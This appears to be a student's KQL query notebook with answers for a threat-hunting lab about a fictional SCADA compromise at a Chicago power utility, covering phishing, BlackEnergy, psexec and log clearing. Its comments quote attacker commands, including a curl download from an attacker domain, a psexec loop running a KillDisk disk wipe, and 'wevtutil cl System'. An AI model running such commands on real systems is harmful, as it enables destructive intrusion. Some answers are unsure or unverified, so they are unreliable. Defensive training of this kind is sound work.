//Critical Compromise In Chicago - ICS
//
//Section 1: SCADA NADA
//These systems rely heavily on SCADA (Supervisory Control and Data Acquisition), which is a specialized control system that helps monitor and manage these operations. 
//When SCADA systems are compromised, the impact can be massive, disrupting entire cities. 🏭

ProcessEvents
| where process_commandline  contains "SCADA" // 5
| count 
//A command was run to scan the network and gather information about SCADA systems.
//What is the name of the executable that was used to perform this scan?

ProcessEvents //curl -o C:\ProgramData\ICSScanner.exe http://chicagogridupdates.com/ICSScanner.exe
| where process_commandline contains "scan"//ICSScanner.exe

//Paste the full timestamp for when this process was executed. 
//C:\ProgramData\ICSScanner.exe --scan --network 192.168.0.0/16 --type SCADA --output C:\ProgramData\SCADA_IPs.txt
// 2024-09-09T11:17:44.000Z

//It looks like an external file was downloaded from a suspicious domain. This could be a key part of the attack. 🪲
//What command was used to download this file?

Employees
| where hostname contains "BDC0-DESKTOP" //10.10.0.8, jibby_saetang@chicagopowergrid.com, jisaetang, SCADA Operator
////hostname ==BDC0-DESKTOP and username==jisaetang

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline has_any ("wget", "curl", "Invoke-WebRequest", "certutil", "bitsadmin", "powershell")
| project timestamp, process_commandline, process_name
| order by timestamp asc //curl -o C:\ProgramData\SCADA_Malicious_Commands.txt

//A destructive tool was used to wipe data and cause the SCADA systems to shut down. 🫨
ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline has_any ("wipe")
| project timestamp, process_commandline, process_name
| order by timestamp asc 
//for /F 'tokens=1' %i in (C:\\ProgramData\\SCADA_IPs.txt) do (
//  set /p password=<C:\\ProgramData\\Extracted_Password.txt
//  psexec.exe \\%i -u administrator -p %password% cmd /c "\\%i\\SCADA\\KillDisk.exe --all --wipe"
//)
// KillDisk.exe

//What legitimate Windows tool was exploited to carry out these remote executions?;psexec.exe
//
//What executable did the theat actor use to establish persistence and perform reconnaissance on the SCADA systems during the attack?

//1-Persistence — schtasks, reg add, sc create, startup registry keys
//2-Reconnaissance — whoami, systeminfo, nltest, nmap, netstat

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline has_any ("schtasks", "reg add", "startup", "HKLM", "HKCU", "sc create", "net use", "whoami", "ipconfig", "systeminfo", "nltest", "nmap", "ping", "arp", "netstat", "tasklist", "wmic", "net user")
| project timestamp, process_commandline, process_name

//Executable

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| summarize count() by process_name
| order by count_ asc

// copy the results and search with "Claude" to identify What executable did the theat actor use to establish persistence and perform reconnaissance on the SCADA systems

//BlackEnergy.exe Known ICS/SCADA malware used against power grids — this is your answer!
//dumpit.exeMemory dumping tool — used for credential theft
//grr.exe / grrservice.exeGoogle Rapid Response — remote live forensics/recon tool
//stritz.exeUnknown — worth investigating

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline has_any ("BlackEnergy.exe")
| project timestamp, process_commandline, process_name

// What is the name of the group responsible for these attacks?
//https://osintframework.com/

// Sandworm

//What is the timestamp for the first time BlackEnergy was observed running in the command line on any host in our environment?

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline contains "BlackEnergy"
| summarize first_seen = min(timestamp) //2024-08-29T08:28:45.000Z

//On how many hosts was BlackEnergy present?

ProcessEvents
| where process_commandline contains "BlackEnergy"
| distinct hostname
| project hostname //1 BDC0-DESKTOP

//What is the hostname where BlackEnergy was found? BDC0-DESKTOP

//What is the name of the employee that BDC0-DESKTOP belongs to?

Employees
|  where hostname contains "BDC0-DESKTOP" //Jibby Saetang role SCADA Operator

//What is the name of the file that the user downloaded, which is likely related to BlackEnergy?
FileCreationEvents
| where hostname contains "BDC0-DESKTOP"
| where path contains "download" //Urgent_Cyber_Threat_Alert.zip

//What is the timestamp for when the user downloaded that file?
OutboundNetworkEvents
| where url contains "Urgent_Cyber_Threat_Alert.zip" //http://chicagogridupdates.com/published/public/files/images/Urgent_Cyber_Threat_Alert.zip
//2024-08-29T08:28:01.000Z

//What is the SHA256 hash of the file created immediately after the downloaded file?
FileCreationEvents
| where hostname == 'BDC0-DESKTOP'
| where timestamp >= datetime(2024-08-29T08:28:01Z)
|take 2 //1dc1dbfc1d636fed5cebe43787a7abf2df4fbb51e1beaec34ba72dd5152edc81 //BlackEnergy.exe

//What process shows the user opening the zip file? (paste the full command)

ProcessEvents
| where process_commandline contains "Urgent_Cyber_Threat_Alert.zip" //Explorer.exe "C:\Users\jisaetang\Downloads\Urgent_Cyber_Threat_Alert.zip"

//What is the name of the domain that BlackEnergy beacons to after execution?

OutboundNetworkEvents
| where src_ip   == "10.10.0.8"
| where url contains "Urgent_Cyber_Threat_Alert.zip"
| project timestamp, url
| order by timestamp asc //http://chicagogridupdates.com/published/public/files/images/Urgent_Cyber_Threat_Alert.zip
//chicagogridupdates.com


//Section 2: Phish and Chips 
//Urgent_Cyber_Threat_Alert.zip

//Which sender address did the threat actor use to target the highest number of employees?
Email
| where subject contains "Critical: Grid Security Update Required"
| summarize total_recipients = count(recipient) by sender
| order by total_recipients desc // thresher_libero@hotmail.com
//joseph_eisenman@chicagopowergrid.com, thresher_libero@hotmail.com, elizabeth_nunmaker@chicagopowergrid.com, chopping_asbestosis@verizon.com


//What threat actor controlled IP was used to log in to the most accounts?

Email
| where sender contains "thresher_libero@hotmail.com" 
//recipient elizabeth_nunmaker@chicagopowergrid.com, tina_seburg@chicagopowergrid.com joseph_eisenman@chicagopowergrid.com
//steve_mcgrath@chicagopowergrid.com, ralph_tyler@chicagopowergrid.com


AuthenticationEvents
| where result == "Successful Login"
| where src_ip !startswith "10."
| summarize unique_accounts = dcount(username) by src_ip
| top 1 by unique_accounts desc //87.250.252.242 we have also 104.244.42.129 

//The attacker performed reconnaissance on two SCADA operators but chose to target only one.
//Which SCADA operator was not targeted?

//The phishing email you found earlier has link or attachment details.
//Look at the link or attachment columns in the Email table to see what malicious payload was delivered.

Email
| where sender contains "thresher_libero@hotmail.com" //subject [EXTERNAL] Critical: Severe Security Breach Detected - Immediate Action Required

Email 
| where link contains "Urgent_Cyber_Threat_Alert.zip"


Employees
| where role contains "scada"
| project username, role, hostname, name // waho, Waymon Ho SCADA Administrator NYWC-MACHINE, jisaetang Jibby Saetang BDC0-DESKTOP SCADA Operator

//employe distinc role
Employees
| distinct role

Email
| where recipient  contains "sarah"


// check for reconnaissance both username

ProcessEvents
| where username  == "waho" or username  == "jisaetang" 
| where process_commandline has_any ("schtasks", "reg add", "startup", "HKLM", "HKCU", "sc create", "net use", "whoami", "ipconfig", "systeminfo", "nltest", "nmap", "ping", "arp", "netstat", "tasklist", "wmic", "net user")
| project timestamp, process_commandline, process_name, username // Jibby Saetang

AuthenticationEvents
| where src_ip == "87.250.252.242" or src_ip == "104.244.42.129" //joeisenman //joseph_eisenman@chicagopowergrid.com, kajackson, stmcgrath, jefoley, elnunmaker, ratyler, altorres
| project timestamp, username, result, hostname
| order by timestamp asc

Employees
| where role has "SCADA"
| project name, role

Email
| where sender == "thresher_libero@hotmail.com" 
////***

AuthenticationEvents
| where src_ip == "87.250.252.242"
| where result == "Failed Login"
| where username in (
    Employees
    | where role in ("SCADA Operator", "SCADA Administrator")
    | distinct username
)
| project timestamp, username, result
| order by timestamp asc

Employees
| where role in ("SCADA Operator", "SCADA Administrator")
| project name, username, role, hostname

AuthenticationEvents
| where username in ("waho", "jisaetang")
| where src_ip == "87.250.252.242"
| project timestamp, username, result
| order by timestamp asc

ProcessEvents
| where process_commandline has_any ("net user", "net group", "ldap", "dsquery", "nltest")
| project timestamp, hostname, process_commandline
| order by timestamp asc

ProcessEvents
| where process_commandline has_any ("waho", "jisaetang", "Waymon", "Jibby", "NYWC-MACHINE", "BDC0-DESKTOP")
| project timestamp, hostname, process_commandline
| order by timestamp asc

///I do not know


//Which compromised employee’s account was used to send the first phishing email to the final victim? attacker//joseph_eisenman@chicagopowergrid.com
// victim //Jibby Saetang
//sources https://medium.com/@baileyluu/kc7-critical-compromise-in-chicago-scada-systems-reports-c44bc9e1d52d

//# Attacker's Email Addresses
//# Threat actor used these emails to trick employees into sharing information like login credentials 
//# Phishing for Information; T1598
//thresher_libero@hotmail.com
//dissemblelebanon@aol.com
//chopping_asbestosis@verizon.com
//# Malware Delivery Email Address
//# Threat actor used employees compromised accounts to send malicious link 
//# which download malicious attachment upon clicking the link
//# Spearphishing Link; T1566.002
//joseph_eisenman@chicagopowergrid.com
//elizabeth_nunmaker@chicagopowergrid.com

Email
| where timestamp between ( datetime(2024-08-28) ..  datetime(2024-09-05))
| where sender contains "dissemblelebanon@aol.com" or sender contains "chopping_asbestosis@verizon.com" or sender contains "thresher_libero@hotmail.com" or sender contains "joseph_eisenman@chicagopowergrid.com" or sender contains "elizabeth_nunmaker@chicagopowergrid.com"
| where recipient contains "chicagopowergrid.com"
|distinct recipient

Employees
| where role contains "Operations Manager" or role contains "Network Administrator"

//What command was used to enumerate the list of domain controllers within the network?

ProcessEvents
| where hostname == "BDC0-DESKTOP"
| where process_commandline contains "list" //nltest /dclist:chicagogrid.local

//What file path did the attacker use to store the results of their password file search?

FileCreationEvents
| where hostname == "BDC0-DESKTOP"
| where path contains "pass" //C:\ProgramData\Password_Files.txt

//What upcoming corporate event did the threat actor browse on the chicagopowergrid.com website?

 InboundNetworkEvents
| where src_ip == "87.250.252.242" or src_ip == "104.244.42.129"
| where url contains "event" and url contains "chicagopowergrid.com"
//karaoke-night //https://chicagopowergrid.com/events/upcoming-corporate-karaoke-night/

//The attacker attempted to cover their tracks by clearing specific event logs. What command was used to clear the System event log?

ProcessEvents
| where timestamp > datetime(2024-08-27T08:31:28)
| where hostname contains "BDC0-DESKTOP"
| where process_commandline contains "system" and  process_commandline contains "cl"
//wevtutil cl System

